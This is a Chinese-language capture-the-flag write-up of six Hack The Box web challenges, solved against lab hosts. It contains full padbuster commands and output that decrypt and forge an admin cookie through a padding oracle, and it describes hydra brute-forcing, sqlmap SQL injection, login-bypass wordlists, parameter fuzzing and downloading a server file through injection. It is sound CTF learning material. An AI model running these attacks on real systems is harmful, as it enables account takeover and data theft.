0x01 [50 Points] I know Mag1k
問題描述:
Can you get to the profile page of the admin?
訪問分配的地址,是一個帶注冊的登入頁面:
嘗試常規注入,無效
來到注冊頁面注冊,再退出,在使用已有的用戶名登入會發現有一個用戶名枚舉的漏洞
這時的一個思路就是先通過暴力破解,枚舉出管理員的用戶名,然后結合二次注入注冊一個類似"admin' --"的用戶來成為管理員,但是通過hydra+rockyou.txt百萬級別的字典也沒有爆破出來用戶名,我猜想這樣的思路應該是錯了,將思路轉向登入后的頁面
很簡單的界面,就一個USER PROFILE的button安裝題目的意識也就是去訪問admin的profile頁面,首當其沖就是cookie了,在cookie中發現一個iknowmag1k值很可疑:
看着像padding oracle,padbuster了一遍,出的結果是亂碼,在hack the box的論壇發現了坑的所在,要帶上PHPSESSID(帖子里是說所有的cookie,實測帶上這個就行了),padding出來的結果:
# padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 3849
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 4 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 3849 N/A
2 1 500 63 N/A
3 ** 254 500 2203 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 3
Continuing test with selection 3
[+] Success: (186/256) [Byte 8]
[+] Success: (147/256) [Byte 7]
[+] Success: (83/256) [Byte 6]
[+] Success: (66/256) [Byte 5]
[+] Success: (255/256) [Byte 4]
[+] Success: (12/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (95/256) [Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 156a4e02aa02e26a
[+] Intermediate Bytes (HEX): a97bf204baae6f47
[+] Plain Text: {"user":
Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 4 ***
[+] Success: (252/256) [Byte 8]
[+] Success: (110/256) [Byte 7]
[+] Success: (221/256) [Byte 6]
[+] Success: (126/256) [Byte 5]
[+] Success: (219/256) [Byte 4]
[+] Success: (199/256) [Byte 3]
[+] Success: (228/256) [Byte 2]
[+] Success: (193/256) [Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): f2f402b77e145e3b
[+] Intermediate Bytes (HEX): 371b3f2086209005
[+] Plain Text: "qq","ro
*** Starting Block 3 of 4 ***
[+] Success: (161/256) [Byte 8]
[+] Success: (209/256) [Byte 7]
[+] Success: (158/256) [Byte 6]
[+] Success: (168/256) [Byte 5]
[+] Success: (120/256) [Byte 4]
[+] Success: (218/256) [Byte 3]
[+] Success: (106/256) [Byte 2]
[+] Success: (106/256) [Byte 1]
Block 3 Results:
[+] Cipher Text (HEX): d504392ef91095e0
[+] Intermediate Bytes (HEX): 9e91208d5c612d5e
[+] Plain Text: le":"use
*** Starting Block 4 of 4 ***
[+] Success: (28/256) [Byte 8]
[+] Success: (110/256) [Byte 7]
[+] Success: (234/256) [Byte 6]
[+] Success: (8/256) [Byte 5]
[+] Success: (210/256) [Byte 4]
[+] Success: (190/256) [Byte 3]
[+] Success: (223/256) [Byte 2]
[+] Success: (81/256) [Byte 1]
Block 4 Results:
[+] Cipher Text (HEX): 537e654bc49b2f44
[+] Intermediate Bytes (HEX): a726442bfc1590e5
[+] Plain Text: r"}
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): {"user":"qq","role":"user"}
[+] Decrypted value (HEX): 7B2275736572223A227171222C22726F6C65223A2275736572227D0505050505
[+] Decrypted value (Base64): eyJ1c2VyIjoicXEiLCJyb2xlIjoidXNlciJ9BQUFBQU=
-------------------------------------------------------
解密發現cookie的內容為{"user":"qq","role":"user"},將其改為{"user":"qq","role":"admin"},並使用padbuster加密:
# padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 3845
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 4
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 3845 N/A
2 ** 255 500 2203 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (97/256) [Byte 8]
[+] Success: (155/256) [Byte 7]
[+] Success: (87/256) [Byte 6]
[+] Success: (153/256) [Byte 5]
[+] Success: (61/256) [Byte 4]
[+] Success: (188/256) [Byte 3]
[+] Success: (151/256) [Byte 2]
[+] Success: (167/256) [Byte 1]
Block 4 Results:
[+] New Cipher Text (HEX): 380060bb67ae639a
[+] Intermediate Bytes (HEX): 516e42c663aa679e
[+] Success: (194/256) [Byte 8]
[+] Success: (151/256) [Byte 7]
[+] Success: (249/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (212/256) [Byte 4]
[+] Success: (209/256) [Byte 3]
[+] Success: (102/256) [Byte 2]
[+] Success: (197/256) [Byte 1]
Block 3 Results:
[+] New Cipher Text (HEX): 5ff80b13f1650f52
[+] Intermediate Bytes (HEX): 339d2929d3046b3f
[+] Success: (132/256) [Byte 8]
[+] Success: (51/256) [Byte 7]
[+] Success: (125/256) [Byte 6]
[+] Success: (192/256) [Byte 5]
[+] Success: (105/256) [Byte 4]
[+] Success: (123/256) [Byte 3]
[+] Success: (98/256) [Byte 2]
[+] Success: (164/256) [Byte 1]
Block 2 Results:
[+] New Cipher Text (HEX): 76e8f2b068a2bd12
[+] Intermediate Bytes (HEX): 549983924480cf7d
[+] Success: (130/256) [Byte 8]
[+] Success: (167/256) [Byte 7]
[+] Success: (153/256) [Byte 6]
[+] Success: (11/256) [Byte 5]
[+] Success: (226/256) [Byte 4]
[+] Success: (20/256) [Byte 3]
[+] Success: (142/256) [Byte 2]
[+] Success: (191/256) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 32579f6894167945
[+] Intermediate Bytes (HEX): 4975ea1bf1645b7f
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: MlefaJQWeUV26PKwaKK9El%2F4CxPxZQ9SOABgu2euY5oAAAAAAAAAAA%3D%3D
-------------------------------------------------------
使用新的cookie值登入,得到flag:
(這里的操作不是我做的,完全是照搬的先知大佬的。padbuster我也是第一次遇到,有時間整理一下它的使用方法!)
0x02 [20 Points] Lernaean
問題描述:
Your target is not very good with computers. Try and guess their password to see if they may be hiding anything!
訪問地址是一個登入,提示不要爆破密碼,可是google一下Lernaean,第一條就是hydra,不爆破有鬼
BURP抓包爆破:
這里爆破成功的截圖沒有放上來,不過還是要記一下:國外的密碼盡量使用這個rockyou.txt
0x03 [30 Points] Cartographer
問題描述:
Some underground hackers are developing a new command and control server. Can you break in and see what they are up to?
訪問分配給我們的動態地址http://docker.hackthebox.eu:41098/,是一個登入的頁面
隨便輸入一些數據、提交、開代理抓包:
使用burp scanner進行初步的掃描,發現注入問題:
使用sqlmap進行利用:
先用sqlmap慢慢跑着,這里已經有了注入問題,那么萬能密碼就能用了啊!!!
上字典:
爆出一堆萬能密碼,但是返回來的登錄效果是一個302跳轉頁面。
它跳轉到了這個頁面:panel.php?info=home
home頁面不存在,那么就直接探測一些敏感頁面:
找到了flag
0x04 [20 Points] Emdee five for life
問題描述:
Can you encrypt fast enough?
訪問網頁發現是一個客戶端與服務器進行MD5算術匹配的網頁腳:
其中有着刷新時間,會很快,既然人做不到這么快,那就用python造個網頁回執腳本:
依據Html源碼,編寫Python腳本進行利用:
import requests
import hashlib
import re
url="http://docker.hackthebox.eu:52501/"
r=requests.session()
out=r.get(url)
rr = re.compile(r"<h3 align='center'>(\S+)</h3>", re.I)
str1 = rr.findall(out.text)
str2=hashlib.md5(str1[0].encode('utf-8')).hexdigest()
data={'hash': str2}
out = r.post(url = url, data = data)
print(out.text)
執行效果:flag確實是藏在匹配成功的頁面中
0x05 [20 Points] Fuzzy
題目描述:
We have gained access to some infrastructure which we believe is connected to the internal network of our target. We need you to help obtain the administrator password for the website they are currently developing.
初始頁面為一個靜態頁面:
由於這個頁面是純靜態的,沒有什么調用功能,再加上提示的Fuzz,那就工具上手吧:
FUZZ到一個/api/action.php,訪問后提示未設置參數:
繼續Fuzz參數:
Fuzz出參數reset:
最后Fuzz ID:
發現可用ID:
備注:OWASP要好好學學了!
0x06 [30 Points] FreeLancer
題目描述:
Can you test how secure my website is? Prove me wrong and capture the flag!
通過服務器返回的頁面備注信息,發現一個調用id參數的頁面:
通過手動檢測,發現了基於布爾的sql注入,上手查表:
這個safeadmin看似有點東西,查一查:
找到對應的賬號密碼:
因為存在賬號密碼,那么它很有可能就存在相應的登錄界面。
經過了多番的尋找與探測,沒能探測出相應的登錄界面,而這就導致我暫未能通過別的方法繼續去搜尋flag。
通過google搜尋國外大佬的WP,找到一篇:人家直接通過dirsearch查到了還有這樣一個目錄:/administrat/
是我的dirsearch不夠強大嗎?不!是我太菜了!我哭了......
找到相應的登錄頁面,發現拿到的密碼是加過密的,無法直接登錄!
再探測一波/administrat/目錄:
發現存在/administrat/panel.php這樣一個文件,還不能直接訪問,他會跳轉到主頁,很類似於管理員的主頁跳轉方式!
這個時候,不要忘掉剛剛找到的sql注入點,丟到sqlmap里面,把這個panel.php文件下載一下:
果然不出所料,讓我找的好苦!~
0x07 參考鏈接
https://xz.aliyun.com/t/2765
https://www.cnblogs.com/qftm/p/11260600.html
https://petircysec.com/hackthebox-ctf-freelancer/